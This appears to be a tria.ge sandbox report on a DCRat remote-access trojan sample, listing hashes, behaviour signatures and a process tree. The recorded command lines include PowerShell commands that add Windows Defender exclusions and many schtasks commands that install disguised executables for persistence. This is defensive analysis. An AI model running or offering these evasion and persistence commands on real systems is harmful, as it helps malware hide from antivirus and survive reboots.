Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    146s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/12/2024, 19:38 UTC

General

  • Target

    JaffaCakes118_7f7c7bda6fcb4205a896f40083a5bc265cc6e7042044d1a88da39f781f024bbe.exe

  • Size

    1.3MB

  • MD5

    cb10490bf0f347f0fcfdb2799270b73a

  • SHA1

    02d258f594c46471c385c72fd765d58cc2fc87a6

  • SHA256

    7f7c7bda6fcb4205a896f40083a5bc265cc6e7042044d1a88da39f781f024bbe

  • SHA512

    ff8bd9ec4326ead22774f00c7f9d3dc70b57f56fa7a3c59f0b50276d9dd622790b9a623367f5f6790944152add6a891910f3065803e34d02d923566f081a6749

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 42 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 13 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 42 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7f7c7bda6fcb4205a896f40083a5bc265cc6e7042044d1a88da39f781f024bbe.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7f7c7bda6fcb4205a896f40083a5bc265cc6e7042044d1a88da39f781f024bbe.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4032
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3760
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\services.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3368
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\Registry.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3584
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3032
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\sppsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4336
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3972
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1020
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\SppExtComObj.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2012
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\dllhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3360
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\Accessories\en-US\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3232
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\StartMenuExperienceHost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3776
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\taskhostw.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Pictures\OfficeClickToRun.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1112
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Desktop\taskhostw.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2052
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\sppsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1376
          • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
            "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2836
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iRE9Vp3kbL.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4276
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:2276
                • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                  "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2680
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\p6CE4ikEee.bat"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1292
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      9⤵
                        PID:4252
                      • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                        "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:5076
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HiXkD60p2N.bat"
                          10⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1992
                          • C:\Windows\system32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            11⤵
                              PID:312
                            • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                              "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                              11⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Modifies registry class
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:3492
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iLsGNVHQP6.bat"
                                12⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3220
                                • C:\Windows\system32\w32tm.exe
                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  13⤵
                                    PID:2112
                                  • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                    "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                    13⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Modifies registry class
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4620
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SU2rmp5bpW.bat"
                                      14⤵
                                        PID:2976
                                        • C:\Windows\system32\w32tm.exe
                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                          15⤵
                                            PID:1688
                                          • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                            "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                            15⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Modifies registry class
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3052
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NczlPfxoCy.bat"
                                              16⤵
                                                PID:3512
                                                • C:\Windows\system32\w32tm.exe
                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  17⤵
                                                    PID:4068
                                                  • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                                    "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                                    17⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Modifies registry class
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4384
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cOf3pucYXi.bat"
                                                      18⤵
                                                        PID:4328
                                                        • C:\Windows\system32\w32tm.exe
                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          19⤵
                                                            PID:860
                                                          • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                                            "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                                            19⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Modifies registry class
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2576
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kNGCBu7dv8.bat"
                                                              20⤵
                                                                PID:4888
                                                                • C:\Windows\system32\w32tm.exe
                                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  21⤵
                                                                    PID:372
                                                                  • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                                                    "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                                                    21⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2652
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gPrDhQDX5J.bat"
                                                                      22⤵
                                                                        PID:1564
                                                                        • C:\Windows\system32\w32tm.exe
                                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                          23⤵
                                                                            PID:1984
                                                                          • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                                                            "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                                                            23⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2608
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4stVUxPy0P.bat"
                                                                              24⤵
                                                                                PID:4020
                                                                                • C:\Windows\system32\w32tm.exe
                                                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                  25⤵
                                                                                    PID:1492
                                                                                  • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                                                                    "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                                                                    25⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3224
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DiMaLaQqUm.bat"
                                                                                      26⤵
                                                                                        PID:3764
                                                                                        • C:\Windows\system32\w32tm.exe
                                                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                          27⤵
                                                                                            PID:4432
                                                                                          • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                                                                            "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                                                                            27⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Modifies registry class
                                                                                            PID:1060
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Nl6pt1R060.bat"
                                                                                              28⤵
                                                                                                PID:4600
                                                                                                • C:\Windows\system32\w32tm.exe
                                                                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                  29⤵
                                                                                                    PID:1696
                                                                                                  • C:\Program Files (x86)\Windows Media Player\taskhostw.exe
                                                                                                    "C:\Program Files (x86)\Windows Media Player\taskhostw.exe"
                                                                                                    29⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3052
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4668
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3532
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3048
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\Registry.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1264
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\Registry.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4600
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\Registry.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1812
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1668
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4908
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:5036
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files\Java\sppsvc.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1688
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Java\sppsvc.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1756
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Java\sppsvc.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3608
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1344
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4784
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4772
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2060
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2320
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2332
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Saved Games\SppExtComObj.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3524
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\SppExtComObj.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1844
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Saved Games\SppExtComObj.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3120
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\providercommon\dllhost.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2280
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4580
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4760
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\System.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3068
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\System.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3044
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\System.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2692
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\SoftwareDistribution\StartMenuExperienceHost.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1932
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2824
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\SoftwareDistribution\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:640
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Media Player\taskhostw.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1508
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\taskhostw.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1904
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Media Player\taskhostw.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1664
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Pictures\OfficeClickToRun.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2236
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\OfficeClickToRun.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1592
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Pictures\OfficeClickToRun.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2248
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\taskhostw.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3320
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\Desktop\taskhostw.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:5088
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Desktop\taskhostw.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3628
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Mail\sppsvc.exe'" /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4080
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\sppsvc.exe'" /rl HIGHEST /f
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3652
                                          • C:\Windows\system32\schtasks.exe
